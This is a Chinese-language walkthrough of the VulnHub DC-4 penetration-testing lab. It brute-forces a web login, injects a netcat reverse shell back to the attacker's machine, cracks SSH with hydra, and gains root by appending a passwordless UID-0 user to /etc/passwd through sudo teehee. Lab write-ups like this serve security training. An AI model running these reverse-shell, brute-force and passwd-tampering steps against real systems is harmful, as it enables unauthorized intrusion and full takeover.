標(biāo)簽：弱口令、命令注入、反彈shell、linux提權(quán)

0x00 環(huán)境準(zhǔn)備

下載地址：https://www.vulnhub.com/entry/dc-4,313/
flag數(shù)量：1
攻擊機(jī)：kali
攻擊機(jī)地址：192.168.1.31
靶機(jī)描述：

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

0x01 信息搜集

1.探測靶機(jī)地址

命令：arp-scan -l

靶機(jī)地址：192.168.1.32

2.探測靶機(jī)開放端口

命令：nmap -sV -p- 192.168.1.32

開放了22端口和80端口，先看一下80端口。

是個(gè)登錄界面，不是CMS。

0x02 爆破弱口令

嘗試一下萬能密碼，不行。那就爆破一下用戶名admin，碰碰運(yùn)氣。

爆破成功了，發(fā)現(xiàn)了admin賬戶的密碼：admin / happy

0x03 反彈shell

使用剛才爆破出來的賬號密碼登錄一下
!](https://upload-images.jianshu.io/upload_images/9221879-5c9b142df29778cc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

點(diǎn)擊command發(fā)現(xiàn)可以執(zhí)行三個(gè)命令

使用burp抓包看看，發(fā)現(xiàn)命令可以自定義

那就執(zhí)行命令反彈一個(gè)shell到Kali上，首先在kali上監(jiān)聽一個(gè)端口，命令：nc -lnvp 4444

然后使用burp抓包執(zhí)行反彈shell的命令：nc+-e+/bin/bash+192.168.1.31+4444。使用加號代替空格。

kali已經(jīng)接收到shell了

為了操作更方便，在shell中輸入命令：python -c "import pty;pty.spawn('/bin/bash')"

0x04 hydra爆破ssh登錄密碼

在靶機(jī)的/home/jim/backups目錄中發(fā)現(xiàn)了一個(gè)舊密碼的備份文件

將密碼復(fù)制下來存儲到一個(gè)文件中，使用hydra進(jìn)行爆破，因?yàn)槭窃趈im的home中發(fā)現(xiàn)的，所以用戶名設(shè)置為jim，命令：hydra -l jim -P dc4oldpass.txt ssh://192.168.1.32

爆破出來一個(gè)賬戶：jim / jibril04

0x05 橫向移動

使用ssh登錄命令登錄剛才爆破出來的賬號，命令：ssh jim@192.168.1.32
輸入sudo -l查看有沒有可以提權(quán)的命令或文件

發(fā)現(xiàn)當(dāng)前身份不能提權(quán)，那就看看還有沒有其他信息。
在/home/jim目錄下發(fā)現(xiàn)一個(gè)郵件，看起來是root賬號發(fā)過來的

好像沒什么用，那就看一下郵件文件夾下有沒有什么東西。

這封郵件是charles發(fā)來的，在郵件的末尾還寫了密碼，那就登錄charles賬號看看。登錄賬號密碼：charles / ^xHhA&hvim0y，命令：su charles

這次使用sudo -l命令發(fā)現(xiàn)可以使用teehee提權(quán)，因?yàn)樗梢栽跊]有root密碼的情況下執(zhí)行。

0x06 提權(quán)

通過向passwd文件中追加一個(gè)帶有root權(quán)限的用戶來提權(quán)。
命令：echo "dn::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

passwd文件中的格式：
[用戶名]:[密碼]:[UID]:[GID]:[身份描述]:[主目錄]:[登錄shell]

提權(quán)后，登錄dn賬號，發(fā)現(xiàn)已經(jīng)擁有root權(quán)限了。
命令：su dn，密碼為空，直接回車（這里當(dāng)時(shí)忘截圖了）

在/root文件夾下發(fā)現(xiàn)了flag.txt文件

以上就是DC-4靶機(jī)的walkthrough，由于菜的離譜，現(xiàn)在還不能完全自己來做完，還要看大佬的文章，如果有什么問題歡迎指出。參考鏈接我會在下面寫上。

由于我不會每天都登錄簡書，所以有什么私信或者評論我都不能及時(shí)回復(fù)，如果想要聯(lián)系我最好給我發(fā)郵件，郵箱：Z2djMjUxMTBAMTYzLmNvbQ==，如果發(fā)郵件請備注“簡書”

參考鏈接：

1.VulnHub通關(guān)日記-DC_4-Walkthrough
2.VulnHub—DC-4
3.Linux下幾種反彈Shell方法的總結(jié)與理解

`